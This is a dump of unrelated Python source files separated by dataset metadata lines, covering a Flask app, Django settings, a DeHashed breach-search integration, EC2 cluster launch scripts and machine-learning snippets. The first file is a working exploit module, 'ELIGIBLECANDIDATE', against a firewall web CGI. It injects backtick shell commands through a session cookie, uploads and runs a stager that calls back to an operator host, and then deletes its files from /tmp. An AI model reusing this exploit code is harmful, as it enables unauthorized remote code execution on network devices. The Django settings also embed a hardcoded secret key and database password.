from fosho.requests.exceptions import *
class ELCAExploit(HTTPSExploit):
name = "ELIGIBLECANDIDATE"
version = "v1.1.0.1"
desc="What is the sound of a single thread blocking?"
modes = ["nopen"]
exploit_url= "/cgi/maincgi.cgi"
target_url= "/site/image/white.gif"
stagerfn = "stage/stager.sh"
tinyexec = "stage/tiny-exec/tiny-exec"
setlog = "stage/setlog/setlog"
required_exploit = HTTPSExploit.required_exploit+["cid"]
required_probe = ["cid"]
required_survey = ["cid"]
required_clean = ["cid"]
timeout = 120
cfg = "ELCA.cfg"
@classmethod
def add_args(cur,cls):
parser,subparsers = HTTPSExploit.add_args(cls)
egroup = parser.add_argument_group("%s Options" %
cls.name)
egroup.add_argument("--cid",type=str,help="Name of session ID in cookie (default: auto)")
return parser,subparsers
def touch(self,resp=None):
if not resp:
resp = self.head(self.target_url)
if 'etag' in resp.headers:
etag,date = self._parse_etag(resp.headers['etag'])
##
self.log.info("Etag - %s; Last modified - %s" % (etag,date))
def probe(self):
target = "/site/pages/index.html"
self.log.info("Checking current %s etag" % target)
old = self.get_etag(target)
##
sleep(1)
self.log.info("Running touch on %s" % target)
self._run_cmd("touch /w*/*/*/p*/*")
self.log.info("Checking etag again to confirm")
new = self.get_etag(target)
if new[0] == old[0]:
return "Unable to touch %s" % target
def exploit(self):
self.log.info("Cleaning up /tmp/ ...")
self._run_cmd("rm -f /t*/cgi*")
self._upload_run()
def clean(self):
''''''
self.log.info("Cleaning up /tmp/ ...")
self._run_cmd("rm -f /t*/cgi*")
self._run_cmd("rm -f /t*/.a")
self._run_cmd("rm -f /t*/.te*")
def build_nopen_exploit_payload(self):
##
cmd = "./htttpd %s D=-c%s tos_configd &" % ("./httpd",self.ns.callback)
self.build_exploit_payload(cmd)
def build_exploit_payload(self,cmd="/tmp/httpd"):
##
out = StringIO()
tf = tarfile.open(mode="w:gz",fileobj=out)
##
tf.dereference = True
try:
tf.add(self.tinyexec,arcname='htttpd')
tf.add(self.binpath,arcname='httpd')
tf.add(self.setlog,arcname='httppd')
##
except IOError, e:
self.log.error("Couldn't find file. Ensure paths are correct and you have run make.")
raise e
tf.close()
out.seek(0)
tdata = out.read()
self.folder = randstr(5)
stager = ""
for i,l in enumerate(open(self.stagerfn).readlines()):
if i == 0 or not l.strip().startswith("#"):
stager+=l
##
##
flen = len(stager.format(rand=self.folder,flen=len(stager),cmd=cmd))
self.payload = stager.format(rand=self.folder,flen=flen,cmd=cmd)
self.payload += tdata
def _get_cid(self):
''''''
if self.cid:
self.log.info("Already know cookie id: %s" % self.cid)
return self.cid
try:
cid = self.get(self.exploit_url).cookies.keys()[0]
self.log.info("Detected cookie id: %s" % cid)
return cid
except IndexError:
self.log.warning("Could not reliably detect cookie. Using 'session_id'...")
return "session_id"
def _upload_run(self):
self.log.info("Uploading and moving file...")
p = StringIO(self.payload)
if not self.cid:
self._get_cid()
self.post(self.exploit_url,cookies={self.cid:"x`cp /t*/cg* /tmp/.a`"},
files={randstr(5):p})
self.log.info("Making file executable...")
self._run_cmd("chmod +x /tmp/.a")
self.log.info("Running payload...")
try:
self._run_cmd("/tmp/.a",quiet=True)
except KeyboardInterrupt:
self.log.info("Closed manually by user. Exiting...")
except Timeout:
self.log.info("Connection timed out. Only a problem if the callback was not received.")
def _run_cmd(self,cmd,quiet=False,raw=False):
if quiet:
cmd = "%s 2>&1" % cmd
if not raw:
cmd = "x`%s`" % cmd
if len(cmd) > 24:
self.log.warning("Command is longer than 24 bytes: %s" % cmd)
self.continue_prompt("Are you sure you want to run this? (y/N) ")
if not self.cid:
self._get_cid()
self.log.debug("Running command on target: %s" % cmd)
return self.get(self.exploit_url,cookies={self.cid:cmd})
def _parse_etag(self,etag):
etag = etag.split("/")[-1].strip('"')
date = ctime(int(etag.split("-")[-1],16))
return etag,date
def main():
run_exploit(ELCAExploit)
if __name__=="__main__":
main()
|
unlicense
| 518,061,169,539,913,150
| 29.485549
| 99
| 0.546454
| false
| 3.43807
| false
| false
| false
|
zaibacu/wutu
|
wutu/app.py
|
1
|
1626
|
import sys
import jinja2
from flask import Flask, render_template
from flask_restful import Api
from functools import lru_cache
from wutu.util import *
from wutu.compiler.common import create_base, create_stream, get_data
class CustomFlask(Flask):
"""
Enchanted Flask module
"""
jinja_options = Flask.jinja_options.copy()
jinja_options.update(dict(
variable_start_string='{<',
variable_end_string='>}',
))
def create(index="index.html", ngmodules=None, minify=True, locator=current):
"""
Creates wutu app
:param index: html file for index page
:param minify: Do we want to minify generated JavaScripts (should be False for debug purposes)
:param locator: function which tells where to find templates
:return:
"""
app = CustomFlask(__name__)
api = Api(app)
app.jinja_loader = jinja2.FileSystemLoader(locator())
api.jsstream = create_stream()
create_base(api.jsstream, ngmodules)
@app.route("/")
def index_page():
"""
Endpoint for base page
:return:
"""
try:
return render_template(index)
except IOError:
return "Failed to render template {0}, error: Not found".format(index)
@lru_cache()
@app.route("/wutu.js")
def wutu_js():
if minify:
from jsmin import jsmin
jsdata = jsmin(get_data(api.jsstream))
else:
from jsbeautifier import beautify
jsdata = beautify(get_data(api.jsstream))
return Response(jsdata, mimetype="text/javascript")
app.api = api
return app
|
mit
| 2,517,502,439,025,025,000
| 26.559322
| 98
| 0.630996
| false
| 3.799065
| false
| false
| false
|
zhangyage/Python-oldboy
|
day11/day11_Django/day11_Django/settings.py
|
1
|
2738
|
# -*- coding:utf-8 -*-
"""
Django settings for day11_Django project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'f4#sx65y-0@=d4js9qnq#0b-wnh-r$w2xsf^*ek9@@1*%lzk()'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
#指定一下我们的模板文件的存放路径 注意那个,必须有的
TEMPLATE_DIRS = (
os.path.join(BASE_DIR,'template'),
)
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'web',
#这里需要我们配置我们的app
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
#'django.middleware.csrf.CsrfViewMiddleware',
#注释掉上面的一行可以解决我们使用Django的跨站请求伪造问题
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'day11_Django.urls'
WSGI_APPLICATION = 'day11_Django.wsgi.application'
#连接mysql驱动配置
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'day11',
'USER':'zhangyage',
'PASSWORD':'zhangyage',
'HOST':'192.168.75.133',
'PORT':'3306',
}
}
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
#配置静态文件存放的路径
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR,'static'),
)
|
apache-2.0
| -3,399,185,197,010,899,500
| 22.925926
| 71
| 0.68808
| false
| 2.833333
| false
| false
| false
|
demisto/content
|
Packs/DeHashed/Integrations/DeHashed/DeHashed.py
|
1
|
11742
|
from typing import Union, Dict, Optional, List
from CommonServerPython import * # noqa: E402 lgtm [py/polluting-import]
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
INTEGRATION_CONTEXT_BRAND = "DeHashed"
BASE_URL = "https://api.dehashed.com/"
RESULTS_FROM = 1
RESULTS_TO = 50
class Client(BaseClient):
def __init__(
self,
base_url,
verify=True,
proxy=False,
ok_codes=None,
headers=None,
auth=None,
email=None,
api_key=None,
email_dbot_score='SUSPICIOUS'
):
super().__init__(
base_url,
verify=verify,
proxy=proxy,
ok_codes=ok_codes,
headers=headers,
auth=auth,
)
self.email = email
self.api_key = api_key
self.email_dbot_score = email_dbot_score
def dehashed_search(self, asset_type: Optional[str], value: List[str], operation: Optional[str],
results_page_number: Optional[int] = None) -> dict:
"""
this function gets query parameters from demisto and perform a "GET" request to Dehashed api
:param asset_type: email, ip_address, username, hashed_password, name, vin, address, phone,all_fields.
:param value: value to search
:param operation: choose a search type to perform.
:param results_page_number: a page number to get. every page contains 5,000 entries.
:return: a dictionary containing: a list of entries that match the query, number of total results exits for the
given query, request status, how much time the request took, and balance.
"""
if not value:
raise DemistoException('This command must get "value" as argument')
query_value = ""
if len(value) > 1:
if operation == "is":
query_value = " ".join((f'"{value}"' for value in value))
elif operation == "contains":
query_value = " OR ".join(value)
query_value = f"({query_value})"
elif operation == "regex":
query_value = " ".join((f"/{value}/" for value in value))
else:
if operation == "is":
query_value = f'"{value[0]}"'
elif operation == "contains":
query_value = value[0]
elif operation == 'regex':
query_value = f"/{value[0]}/"
if asset_type == "all_fields":
query_string = f"{query_value}"
else:
query_string = f"{asset_type}:{query_value}"
if results_page_number:
return self._http_request(
"GET",
"search",
params={"query": query_string, "page": results_page_number},
auth=(self.email, self.api_key),
timeout=25,
)
else:
return self._http_request(
"GET",
"search",
params={"query": query_string},
auth=(self.email, self.api_key),
timeout=25
)
def test_module(client: Client) -> str:
"""
Returning 'ok' indicates that the integration works like it is supposed to. Connection to the service is successful.
Args:
client: DeHashed client
Returns:
'ok' if test passed, anything else will fail the test.
"""
result = client.dehashed_search(
asset_type="vin", value=["test", "test1"], operation="is"
)
if isinstance(result, dict):
return "ok"
else:
return f"Test failed because got unexpected response from api: {result}"
def validate_filter_parameters(results_from_value, results_to_value):
if results_to_value <= 0:
raise DemistoException(f'Argument "results_to" expected to be greater than zero, but given:'
f' {results_to_value}')
elif results_from_value <= 0:
raise DemistoException(f'Argument "results_from" expected to be greater than zero, but given:'
f' {results_from_value}')
elif results_to_value > results_from_value:
raise DemistoException('Argument "results_to" expected to be less than or equal to "results_from"')
def filter_results(
entries: list, results_from: Union[int, None], results_to: Union[int, None]
) -> tuple:
"""
gets raw results returned from the api and limit the number of entries to return to demisto
:param entries: search results of the performed query
:param results_from: start range
:param results_to: end range
:return: filtered results
"""
if not results_from:
results_from = RESULTS_FROM
if not results_to:
results_to = RESULTS_TO
if results_to > len(entries):
results_to = len(entries)
validate_filter_parameters(results_to, results_from)
return entries[results_from - 1:results_to], results_from, results_to
def arg_to_int(arg_val: Optional[str], arg_name: Optional[str]) -> Optional[int]:
"""
converts commands arguments to integers
:param arg_name: argument name
:param arg_val: value to convert to int
:return: converted argument as int
"""
if arg_val is None:
return None
if not isinstance(arg_val, str):
return None
try:
result = int(arg_val)
if result <= 0:
raise DemistoException(f'"{arg_name}" expected to be greater than zero.')
return result
except ValueError:
raise DemistoException(
f'"{arg_name}" expected to be Integer. passed {arg_val} instead.'
)
def create_dbot_score_dictionary(indicator_value, indicator_type, dbot_score):
return {
'Indicator': indicator_value,
'Type': indicator_type,
'Vendor': INTEGRATION_CONTEXT_BRAND,
'Score': dbot_score
}
def dehashed_search_command(client: Client, args: Dict[str, str]) -> tuple:
"""
this command returns data regarding a compromised assets given as arguments
:param client: Demisto client
:param args:
- asset_type: email, ip_address, username, hashed_password, name, vin, address, phone,all_fields.
- value: value to search
- operation: choose a search type to perform.
- results_page_number: a page number to get. every page contains 5,000 entries.
- results_from: sets result's start range
- results_to: sets result's end range
:return: Demisto outputs
"""
asset_type = args.get("asset_type")
operation = args.get("operation")
value = argToList(args.get("value"))
results_page_number = arg_to_int(args.get("page"), "page")
results_from = arg_to_int(args.get("results_from"), "results_from")
results_to = arg_to_int(args.get("results_to"), "results_to")
result = client.dehashed_search(asset_type, value, operation, results_page_number)
if not isinstance(result, dict):
raise DemistoException(f"Got unexpected output from api: {result}")
query_data = result.get("entries")
if not query_data:
return "No matching results found", None, None
else:
filtered_results, results_from, results_to = filter_results(
query_data, results_from, results_to
)
query_entries = createContext(
filtered_results, keyTransform=underscoreToCamelCase
)
headers = [key.replace("_", " ") for key in [*filtered_results[0].keys()]]
if not results_page_number:
results_page_number = 1
last_query = {
"ResultsFrom": results_from,
"ResultsTo": results_to,
"DisplayedResults": len(filtered_results),
"TotalResults": result.get("total"),
"PageNumber": results_page_number
}
return (
tableToMarkdown(
f'DeHashed Search - got total results: {result.get("total")}, page number: {results_page_number}'
f', page size is: {len(filtered_results)}. returning results from {results_from} to {results_to}.',
filtered_results,
headers=headers,
headerTransform=pascalToSpace,
),
{
f"{INTEGRATION_CONTEXT_BRAND}.LastQuery(true)": last_query,
f"{INTEGRATION_CONTEXT_BRAND}.Search(val.Id==obj.Id)": query_entries,
},
filtered_results,
)
def email_command(client: Client, args: Dict[str, str]) -> tuple:
"""
This command returns data regarding a compromised email address
:param client: Demisto client
:param args:
- email: the email address that should be checked
:return: Demisto outputs
"""
email_address = argToList(args.get('email'))
result = client.dehashed_search('email', email_address, 'contains')
if not isinstance(result, dict):
raise DemistoException(f"Got unexpected output from api: {result}")
query_data = result.get("entries")
if not query_data:
context = {
'DBotScore':
{
'Indicator': email_address[0],
'Type': 'email',
'Vendor': INTEGRATION_CONTEXT_BRAND,
'Score': 0
}
}
return "No matching results found", context, None
else:
default_dbot_score_email = 2 if client.email_dbot_score == 'SUSPICIOUS' else 3
query_entries = createContext(query_data, keyTransform=underscoreToCamelCase)
sources = [entry.get('obtained_from') for entry in query_data if entry.get('obtained_from')]
headers = [key.replace("_", " ") for key in [*query_data[0].keys()]]
hr = tableToMarkdown(f'DeHashed Search - got total results: {result.get("total")}', query_data, headers=headers,
headerTransform=pascalToSpace)
dbot_score = default_dbot_score_email if len(sources) > 0 else 0
context = {
f'{INTEGRATION_CONTEXT_BRAND}.Search(val.Id==obj.Id)': query_entries,
'DBotScore': create_dbot_score_dictionary(email_address[0], 'email', dbot_score)
}
return hr, context, query_data
def main():
"""
PARSE AND VALIDATE INTEGRATION PARAMS
"""
email = demisto.params().get("credentials", {}).get('identifier', '')
api_key = demisto.params().get("credentials", {}).get('password', '')
base_url = BASE_URL
verify_certificate = not demisto.params().get("insecure", False)
proxy = demisto.params().get("proxy", False)
email_dbot_score = demisto.params().get('email_dbot_score', 'SUSPICIOUS')
LOG(f"Command being called is {demisto.command()}")
try:
client = Client(
base_url,
verify=verify_certificate,
email=email,
api_key=api_key,
proxy=proxy,
headers={"accept": "application/json"},
email_dbot_score=email_dbot_score
)
if demisto.command() == "test-module":
# This is the call made when pressing the integration Test button.
result = test_module(client)
demisto.results(result)
elif demisto.command() == "dehashed-search":
return_outputs(*dehashed_search_command(client, demisto.args()))
elif demisto.command() == "email":
return_outputs(*email_command(client, demisto.args()))
else:
return_error('Command not found.')
# Log exceptions
except Exception as e:
return_error(f"Failed to execute {demisto.command()} command. Error: {str(e)}")
if __name__ in ("__main__", "__builtin__", "builtins"):
main()
|
mit
| -7,711,274,168,360,616,000
| 35.69375
| 120
| 0.590785
| false
| 3.974949
| true
| false
| false
|
kumkee/SURF2016
|
src/marketdata/globalpricematrix.py
|
1
|
3459
|
from coinlist import CoinList
import pandas as pd
from time import time
from time import sleep
import numpy as np
NOW = 0
FIVE_MINUTES = 60*5
FIFTEEN_MINUTES = FIVE_MINUTES * 3
HALF_HOUR = FIFTEEN_MINUTES * 2
HOUR = HALF_HOUR * 2
TWO_HOUR = HOUR * 2
FOUR_HOUR = HOUR * 4
DAY = HOUR * 24
YEAR = DAY * 365
CSV_DEFAULT = 'pm.csv'
COIN_REF = 'LTC'
class GlobalPriceMatrix(CoinList):
def __init__(self, start = DAY, end = NOW, period = HALF_HOUR, csv = None, coin_filter = 0.2):
if not csv:
super(GlobalPriceMatrix, self).__init__()
self._coin_filter = coin_filter
if csv:
self.__getPriceFromFile(csv)
else:
self.__getPriceFromExchange(start, end, period)
def __getPriceFromExchange(self, start, end, period):
t = time()
self._start = t - start
self._end = t - end + 10*period
self._period = period
self.__coinFilter()
self.__checkperiod()
coin = COIN_REF
chart = self.getChart(coin, start = self._start, end = self._end)
cols = [d['date'] for d in chart]
self._pm = pd.DataFrame(index = self._coins, columns = cols).astype('float32')
self.__fillPriceRow(coin, start = self._start, end = self._end)
for c in self._coins:
if c == COIN_REF:
continue
self.__fillPriceRow(c, start = self._start, end = self._end)
def __fillPriceRow(self, coin, start, end):
chart = self.getChart(coin=coin, start=start, end=end)
for c in chart:
self._pm.at[coin, c['date']] = c['close']
@property
def pricedata(self):
return self._pm
@property
def pricematrix(self):
return self._pm.as_matrix()
def getChart(self, coin, start, end):
chart = self.polo.marketChart( \
pair = self.allActiveCoins.at[coin, 'pair'], \
start = start, \
end = end, \
period = self._period )
return chart
def __coinFilter(self):
if(self._coin_filter):
self._coins = self.topNVolume(
n = int(len(self.allActiveCoins) * self._coin_filter)).index
def to_csv(self, filepath = CSV_DEFAULT):
#Save the database into csv file
pm = self._pm.transpose()
pm.index = pd.to_datetime(pm.index, unit = 's')
pm.to_csv(filepath)
def __getPriceFromFile(self, csv = CSV_DEFAULT):
pm = pd.DataFrame.from_csv(csv).astype('float32')
pm.index = pm.index.astype(np.int64)/10**9
self._pm = pm.transpose()
self._start = self._pm.columns[0]
self._end = self._pm.columns[-1]
self._period = self._pm.columns[1] - self._start
def __checkperiod(self):
if self._period == FIVE_MINUTES:
return
elif self._period == FIFTEEN_MINUTES:
return
elif self._period == HALF_HOUR:
return
elif self._period == TWO_HOUR:
return
elif self._period == FOUR_HOUR:
return
elif self._period == DAY:
return
else:
raise ValueError('peroid has to be 5min, 15min, 30min, 2hr, 4hr, or a day')
FIVE_MINUTES = 60*5
FIFTEEN_MINUTES = FIVE_MINUTES * 3
HALF_HOUR = FIFTEEN_MINUTES * 2
#HOUR = HALF_HOUR * 2
TWO_HOUR = HALF_HOUR * 4
FOUR_HOUR = HALF_HOUR * 8
DAY = HALF_HOUR * 48
|
gpl-3.0
| 28,672,610,416,348,292
| 27.121951
| 98
| 0.558832
| false
| 3.387855
| false
| false
| false
|
jangorecki/h2o-3
|
ec2/h2o-cluster-launch-instances.py
|
1
|
4600
|
#!/usr/bin/env python
import os
import sys
import time
import boto
import boto.ec2
# Environment variables you MUST set (either here or by passing them in).
# -----------------------------------------------------------------------
#
os.environ['AWS_ACCESS_KEY_ID'] = ''
os.environ['AWS_SECRET_ACCESS_KEY'] = ''
os.environ['AWS_SSH_PRIVATE_KEY_FILE'] = ''
# Launch EC2 instances with an IAM role
# --------------------------------------
#
iam_profile_resource_name = None
# or
iam_profile_name = None
# Options you MUST tailor to your own AWS account.
# ------------------------------------------------
# SSH key pair name.
keyName = ''
# AWS security group name.
# Note:
# H2O uses TCP and UDP ports 54321 and 54322.
# RStudio uses TCP port 8787.
securityGroupName = 'SecurityDisabled'
# Options you might want to change.
# ---------------------------------
numInstancesToLaunch = 2
instanceType = 'm3.2xlarge'
instanceNameRoot = 'h2o-instance'
# Options to help debugging.
# --------------------------
debug = 0
# debug = 1
dryRun = False
# dryRun = True
# Options you should not change unless you really mean to.
# --------------------------------------------------------
regionName = 'us-east-1'
amiId = 'ami-0b100e61'
#regionName = 'us-west-1'
#amiID = 'ami-c1afd6a1'
#--------------------------------------------------------------------------
# No need to change anything below here.
#--------------------------------------------------------------------------
# Note: this python script was initially developed with boto 2.13.3.
def botoVersionMismatch():
print 'WARNING: Unsupported boto version. Please upgrade boto to at least 2.13.x and try again.'
print 'Comment this out to run anyway.'
print 'Exiting.'
sys.exit(1)
if not 'AWS_ACCESS_KEY_ID' in os.environ:
print 'ERROR: You must set AWS_ACCESS_KEY_ID in the environment.'
sys.exit(1)
if not 'AWS_SECRET_ACCESS_KEY' in os.environ:
print 'ERROR: You must set AWS_SECRET_ACCESS_KEY in the environment.'
sys.exit(1)
if not 'AWS_SSH_PRIVATE_KEY_FILE' in os.environ:
print 'ERROR: You must set AWS_SSH_PRIVATE_KEY_FILE in the environment.'
sys.exit(1)
publicFileName = 'nodes-public'
privateFileName = 'nodes-private'
if not dryRun:
fpublic = open(publicFileName, 'w')
fprivate = open(privateFileName, 'w')
print 'Using boto version', boto.Version
if True:
botoVersionArr = boto.Version.split(".")
if (botoVersionArr[0] != 2):
botoVersionMismatch
if (botoVersionArr[1] < 13):
botoVersionMismatch
if (debug):
boto.set_stream_logger('h2o-ec2')
ec2 = boto.ec2.connect_to_region(regionName, debug=debug)
print 'Launching', numInstancesToLaunch, 'instances.'
reservation = ec2.run_instances(
image_id=amiId,
min_count=numInstancesToLaunch,
max_count=numInstancesToLaunch,
key_name=keyName,
instance_type=instanceType,
security_groups=[securityGroupName],
instance_profile_arn=iam_profile_resource_name,
instance_profile_name=iam_profile_name,
dry_run=dryRun
)
for i in range(numInstancesToLaunch):
instance = reservation.instances[i]
print 'Waiting for instance', i+1, 'of', numInstancesToLaunch, '...'
instance.update()
while instance.state != 'running':
print ' .'
time.sleep(1)
instance.update()
print ' instance', i+1, 'of', numInstancesToLaunch, 'is up.'
name = instanceNameRoot + str(i)
instance.add_tag('Name', value=name)
print
print 'Creating output files: ', publicFileName, privateFileName
print
for i in range(numInstancesToLaunch):
instance = reservation.instances[i]
instanceName = ''
if 'Name' in instance.tags:
instanceName = instance.tags['Name'];
print 'Instance', i+1, 'of', numInstancesToLaunch
print ' Name: ', instanceName
print ' PUBLIC: ', instance.public_dns_name
print ' PRIVATE:', instance.private_ip_address
print
fpublic.write(instance.public_dns_name + '\n')
fprivate.write(instance.private_ip_address + '\n')
fpublic.close()
fprivate.close()
print 'Sleeping for 60 seconds for ssh to be available...'
time.sleep(60)
d = os.path.dirname(os.path.realpath(__file__))
print 'Testing ssh access...'
cmd = d + '/' + 'h2o-cluster-test-ssh.sh'
rv = os.system(cmd)
if rv != 0:
print 'Failed.'
sys.exit(1)
print
print 'Distributing flatfile...'
cmd = d + '/' + 'h2o-cluster-distribute-flatfile.sh'
rv = os.system(cmd)
if rv != 0:
print 'Failed.'
sys.exit(1)
# Distribute flatfile script already prints success when it completes.
|
apache-2.0
| 4,029,750,662,069,026,000
| 25.900585
| 102
| 0.622391
| false
| 3.490137
| false
| false
| false
|
oksome/Tumulus
|
tumulus/tag.py
|
1
|
1267
|
# -*- coding: utf-8 -*-
# This file is part of Tumulus.
#
# Copyright (C) 2013 OKso (http://okso.me)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
See reference: http://www.javascriptkit.com/domref/elementproperties.shtml
'''
from .element import Element, EmptyElement
class Tag(object):
def __init__(self, tagname, element=Element):
self.tagname = tagname
self.element = element
def __call__(self, *inner, **kwargs):
return self.element(self.tagname, components=inner, attributes=kwargs)
class EmptyTag(Tag):
def __call__(self, *inner, **kwargs):
return EmptyElement(self.tagname, attributes=kwargs)
|
agpl-3.0
| 2,938,885,543,379,877,000
| 30.675
| 78
| 0.713496
| false
| 3.886503
| false
| false
| false
|
Calvinxc1/Data_Analytics
|
blog/2017-01-08/oldschool_linear.py
|
1
|
2522
|
#%% libraries
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#%% gradient descent linear regression function
def grad_descent(dataset, features, predictor, learn_rate, max_iters = 10000):
def initialize_model(dataset, features, predictor):
constant_array = np.ones(shape = (len(dataset), 1))
features_array = dataset.loc[:, features].values
features_array = np.append(constant_array, features_array, axis = 1)
predict_array = dataset.loc[:, predictor].values
betas = np.zeros(shape = (len(features) + 1, len(predictor)))
return (features_array, predict_array, betas)
def calc_gradient(features_array, predict_array, betas):
prediction = np.dot(features_array, betas)
predict_error = predict_array - prediction
gradient = -2 * np.dot(features_array.transpose(), predict_error)
return gradient
def update_betas(gradient, betas, learn_rate):
new_betas = betas - (gradient * learn_rate)
return new_betas
def model_error(features_array, predict_array, betas):
prediction = np.dot(features_array, betas)
predict_error = predict_array - prediction
model_error = np.sqrt(np.mean(predict_error ** 2))
return model_error
features_array, predict_array, betas = initialize_model(dataset, features, predictor)
prior_error = np.inf
for iter_count in range(max_iters):
gradient = calc_gradient(features_array, predict_array, betas)
betas = update_betas(gradient, betas, learn_rate)
curr_error = model_error(features_array, predict_array, betas)
if curr_error == prior_error:
break
prior_error = curr_error
return (betas, iter_count, curr_error)
#%% model test collection
house_data = pd.read_csv('kc_house_data.csv')
features = ['sqft_living', 'bedrooms', 'bathrooms']
predictor = ['price']
low_learn = 11.041
high_learn = 11.05
learn_splits = 2500
learn_rates = [10 ** -(i / learn_splits) for i in range(int(low_learn * learn_splits), int(high_learn * learn_splits))]
model_errors = []
iter_counts = []
beta_record = []
for learn_rate in learn_rates:
(betas, iter_count, curr_error) = grad_descent(house_data, features, predictor, learn_rate, max_iters = int(10e3))
model_errors.append(curr_error)
iter_counts.append(iter_count)
beta_record.append(betas)
#%%
plt.plot(np.log(model_errors[0:18]))
#%%
plt.plot(model_errors[17:32])
#%%
plt.plot(iter_counts)
|
gpl-3.0
| 6,453,053,014,177,452,000
| 39.047619
| 119
| 0.666138
| false
| 3.459534
| false
| false
| false
|
jfterpstra/bluebottle
|
bluebottle/recurring_donations/tests/test_api.py
|
1
|
5153
|
from django.core.urlresolvers import reverse
from rest_framework import status
from bluebottle.bb_projects.models import ProjectPhase
from bluebottle.geo.models import Country
from bluebottle.test.factory_models.accounts import BlueBottleUserFactory
from bluebottle.test.factory_models.geo import CountryFactory
from bluebottle.test.factory_models.projects import ProjectFactory
from bluebottle.test.utils import BluebottleTestCase
class MonthlyDonationApiTest(BluebottleTestCase):
def setUp(self):
super(MonthlyDonationApiTest, self).setUp()
self.init_projects()
self.phase_campaign = ProjectPhase.objects.get(slug='campaign')
self.country = CountryFactory()
self.some_project = ProjectFactory.create(amount_asked=500,
status=self.phase_campaign)
self.another_project = ProjectFactory.create(amount_asked=750,
status=self.phase_campaign)
self.some_user = BlueBottleUserFactory.create()
self.some_user_token = "JWT {0}".format(self.some_user.get_jwt_token())
self.another_user = BlueBottleUserFactory.create()
self.another_user_token = "JWT {0}".format(
self.another_user.get_jwt_token())
self.monthly_donation_url = reverse('monthly-donation-list')
self.monthly_donation_project_url = reverse('monthly-donation-project-list')
self.monthly_profile = {'iban': 'NL13TEST0123456789',
'bic': 'TESTNL2A',
'name': 'Nijntje het Konijntje',
'city': 'Amsterdam',
'country': self.country.id,
'amount': u'50.00'}
def test_create_monthly_donation(self):
"""
Tests for creating, retrieving, updating monthly donation.
"""
# Check that user has no monthly donation
response = self.client.get(self.monthly_donation_url,
token=self.some_user_token)
self.assertEqual(response.status_code, status.HTTP_200_OK,
response.data)
self.assertEqual(response.data['count'], 0)
self.assertEqual(response.data['results'], [])
# Create a new monthly donation
response = self.client.post(self.monthly_donation_url,
self.monthly_profile,
token=self.some_user_token)
self.assertEqual(response.status_code, status.HTTP_201_CREATED,
response.data)
self.assertEqual(response.data['amount'],
self.monthly_profile['amount'])
self.assertEqual(response.data['active'], True)
some_monthly_donation_id = response.data['id']
# Reload it and check that all is still well.
response = self.client.get(self.monthly_donation_url,
token=self.some_user_token)
self.assertEqual(response.status_code, status.HTTP_200_OK,
response.data)
self.assertEqual(response.data['count'], 1)
self.assertEqual(response.data['results'][0]['amount'],
self.monthly_profile['amount'])
# Add a preferred projects
monthly_project = {
'donation': some_monthly_donation_id,
'project': self.some_project.slug
}
response = self.client.post(self.monthly_donation_project_url,
monthly_project,
token=self.some_user_token)
self.assertEqual(response.status_code, status.HTTP_201_CREATED,
response.data)
# Reload it. It should have that project embedded
response = self.client.get(self.monthly_donation_url,
token=self.some_user_token)
self.assertEqual(response.status_code, status.HTTP_200_OK,
response.data)
self.assertEqual(len(response.data['results'][0]['projects']), 1)
self.assertEqual(response.data['results'][0]['projects'][0]['project'],
self.some_project.slug)
# Another should not have a monthly donation
response = self.client.get(self.monthly_donation_url,
token=self.another_user_token)
self.assertEqual(response.status_code, status.HTTP_200_OK,
response.data)
self.assertEqual(response.data['count'], 0)
# Another user can't add a project to first monthly donation
monthly_project = {
'donation': some_monthly_donation_id,
'project': self.another_project.slug
}
response = self.client.post(self.monthly_donation_project_url,
monthly_project,
token=self.another_user_token)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN,
response.data)
|
bsd-3-clause
| -2,161,579,183,659,187,500
| 45.423423
| 84
| 0.579856
| false
| 4.423176
| true
| false
| false
|
z01nl1o02/tests
|
mxnet/cifar/cifar10/demo.py
|
1
|
2581
|
import mxnet as mx
from mxnet.gluon import nn
from mxnet import gluon
import sys
import utils
import pdb,os,sys
from importlib import import_module
import logging
import numpy as np
trainBatchSize = 100
testBatchSize = 50
dataShape = (3,32,32)
classNum = 10
pretrained = None
checkpoints = 'checkpoints/'
inputroot = "c:/dataset/cifar/split/"
lr_base = 0.01
weight_decay = 0.0005
mean = np.zeros(dataShape)
